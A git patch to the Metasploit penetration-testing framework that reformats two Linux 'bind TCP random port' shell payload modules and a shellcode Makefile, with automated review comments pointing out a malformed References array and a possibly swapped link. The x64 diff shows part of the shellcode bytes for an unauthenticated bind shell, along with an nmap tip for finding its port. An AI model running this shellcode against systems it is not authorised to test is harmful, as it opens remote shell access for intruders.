From 81a7b1a9bfc431a686278e6d1b780a3713f68ace Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Mon, 11 Nov 2013 10:33:15 -0600
Subject: [PATCH] Fixes for #2350, random bind shellcode

* Moved shortlink to a reference.
* Reformat e-mail address.
* Fixed whitespace
* Use multiline quote per most other module descriptions

Still need to resplat the modules, but it's no big thang to do that after landing. Also, References do not seem to appear for post modules in the normal msfconsole. This is a bug in the UI, not for these modules -- many payloads would benefit from being explicit on their references, so may as well start with these.
---
 external/source/shellcode/linux/ia32/Makefile | 18 ++++++++---------
 .../linux/x64/shell_bind_tcp_random_port.rb | 20 ++++++++++---------
 .../linux/x86/shell_bind_tcp_random_port.rb | 10 ++++++----
 3 files changed, 26 insertions(+), 22 deletions(-)

diff --git a/external/source/shellcode/linux/ia32/Makefile b/external/source/shellcode/linux/ia32/Makefile
index cadd2abf31..77f2294fdf 100644
--- a/external/source/shellcode/linux/ia32/Makefile
+++ b/external/source/shellcode/linux/ia32/Makefile
@@ -1,11 +1,11 @@
 STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
- stager_egghunt stager_sock_find stager_sock_reverse \
- stager_sock_reverse_icmp stager_sock_reverse_udp \
+ stager_egghunt stager_sock_find stager_sock_reverse \
+ stager_sock_reverse_icmp stager_sock_reverse_udp \
 stager_sock_reverse_udp_dns
 STAGES=stage_tcp_shell stage_udp_shell
 SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
- single_reverse_tcp_shell single_reverse_udp_shell single_exec \
- single_shell_bind_tcp_random_port
+ single_reverse_tcp_shell single_reverse_udp_shell single_exec \
+ single_shell_bind_tcp_random_port
 OBJS=${STAGERS} ${STAGES} ${SINGLE}
@@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
 @ruby -p -a -e ' \
 $$F.shift; \
 $$F[0].tap { |s| \
- s.tr! "A-F", "a-f"; \
- t=s.dup; \
- s.clear; \
- s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
- STDIN.eof? ? s<< " # " : s<< "+# "; \
+ s.tr! "A-F", "a-f"; \
+ t=s.dup; \
+ s.clear; \
+ s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
+ STDIN.eof? ? s<< " # " : s<< "+# "; \
 }; \
 $$_ = $$F.join(" ") + "\n"; \
 ' < $*.tmp > $@
diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
index 50abba4dfe..87a48b423a 100644
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
@@ -15,11 +15,13 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
- 'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
- 'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
- 'Assembly source: http://goo.gl/TAveVc',
- 'Author' => 'Geyslan G. Bem ',
+ 'Description' => %q{
+ Listen for a connection in a random port and spawn a command shell.
+ Use nmap to discover the open port: 'nmap -sS target -p-'.
+ },
+ 'Author' => 'Geyslan G. Bem ',
 'License' => BSD_LICENSE,
+ 'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
 'Platform' => 'linux',
 'Arch' => ARCH_X86_64,
 'Payload' =>
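Review bot: The added 'References' entry in the x64 module is a flat `['URL', '...']` rather than a list of pairs; other framework modules declare `'References' => [['URL', 'https://...']]`, and the module-info reference transformer treats each array element as one reference, so here it would most likely see two bare strings ('URL' and the link) instead of a single URL reference. That is a plausible cause of the "references do not seem to appear" symptom the commit message attributes to the UI, and is worth ruling out before blaming msfconsole. Change the line to `'References' => [['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm']],`. Minor wording in the new %q{} description: "Listen for a connection in a random port" reads better as "on a random port", and since this is an unauthenticated bind shell a short caveat such as `Any client that reaches the port first gets the shell.` would help operators. The initialize method and the merge_info hash continue past the end of this hunk.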
@@ -31,21 +33,21 @@ module Metasploit3
 "\x6a\x02" +# pushq $0x2
 "\x5f" +# pop %rdi
 "\xb0\x29" +# mov $0x29,%al
- "\x0f\x05" +# syscall
+ "\x0f\x05" +# syscall
 "\x52" +# push %rdx
 "\x5e" +# pop %rsi
 "\x50" +# push %rax
 "\x5f" +# pop %rdi
 "\xb0\x32" +# mov $0x32,%al
- "\x0f\x05" +# syscall
+ "\x0f\x05" +# syscall
 "\xb0\x2b" +# mov $0x2b,%al
- "\x0f\x05" +# syscall
+ "\x0f\x05" +# syscall
 "\x57" +# push %rdi
 "\x5e" +# pop %rsi
 "\x48\x97" +# xchg %rax,%rdi
 "\xff\xce" +# dec %esi
 "\xb0\x21" +# mov $0x21,%al
- "\x0f\x05" +# syscall
+ "\x0f\x05" +# syscall
 "\x75\xf8" +# jne 40009f
 "\x52" +# push %rdx
 "\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
@@ -54,7 +56,7 @@ module Metasploit3
 "\x54" +# push %rsp
 "\x5f" +# pop %rdi
 "\xb0\x3b" +# mov $0x3b,%al
- "\x0f\x05" # syscall
+ "\x0f\x05" # syscall
 }
 ))
 end
diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
index f46a5bb1a3..4a075f0dcf 100644
--- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
@@ -15,11 +15,13 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
- 'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
- 'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
- 'Assembly source: http://goo.gl/V5OObo',
- 'Author' => 'Geyslan G. Bem ',
+ 'Description' => %q{
+ Listen for a connection in a random port and spawn a command shell.
+ Use nmap to discover the open port: 'nmap -sS target -p-'.
+ },
+ 'Author' => 'Geyslan G. Bem ',
 'License' => BSD_LICENSE,
+ 'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
 'Platform' => 'linux',
 'Arch' => ARCH_X86,
 'Payload' =>
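Review bot: The added 'References' line in the x86 module has the same shape problem as its x64 sibling: a flat `['URL', '...']` where the framework expects an array of pairs, so the reference transformer likely receives two loose strings rather than one URL entry; write it as `'References' => [['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm']],`. Separately, this module is `ARCH_X86` yet the referenced file is named `shell_bind_tcp_random_port_x86_64.asm`, while the x64 module points at `tiny_shell_bind_tcp_random_port.asm`; the upstream author may simply have named the files that way, but it is worth opening both links to confirm the two references were not swapped when the goo.gl shortlinks were expanded. The initialize method and the merge_info hash continue beyond the end of this hunk.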